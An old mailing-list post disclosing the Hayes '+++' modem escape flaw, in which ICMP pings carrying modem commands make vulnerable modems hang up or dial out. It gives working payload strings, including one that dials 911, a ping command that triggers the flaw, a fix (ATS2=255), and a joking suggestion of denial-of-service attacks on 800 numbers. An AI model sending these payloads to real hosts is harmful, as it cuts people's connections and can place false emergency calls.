A minor security note.
There seem to be quite a few cheap modems out there these days that do not
default to the guard time required by the original Hayes standard when
using +++ to put the modem into command mode. In fact, it seems quite a
few non-USR modems are deficient in this regard.
This means that you can ICMP ping someone with modem commands stuffed into
the datagram, and when their machine echos, their modem will execute them.
Examples...
+++ATH0 (Hang up the phone)
+++ATH0,,,DT911 (Hang up the phone, and dial the computer into the
police emergency number)
I was sitting on IRC the other evening, and some script kiddie killed my
PPP connection with this trick. Curious, those of us on the channel
tested our machines, and lo and behold, half the people had vulnerable
modems, including several who had new machines purchased in the last year.
A quick fix is to ATS2=255 in your modem init string, which changes the
escape character.
There are all sorts of entertaining things one can do with the large
number of vulnerable machines on the Net at any given time, like
distributed denial of service attacks against corporate 800 numbers, and
the like.
To see if your modem will go into command mode, and drop your connection
without requiring a guard time around the +++, you can do the following
from another Unix box.
ping -p 2b2b2b415448300d <your IP>
If your line goes dead, and no pings are returned, you have a winning
modem. As I said, this is a very old exploit which has been known for
years, but apparently not by people making the cheap modems which go into
most of today's PCs, when configured to their factory settings.
We now return you to your regular programming.
--
Eric Michael Cordian 0+
O:.T:.O:. Mathematical Munitions Division
"Do What Thou Wilt Shall Be The Whole Of The Law"
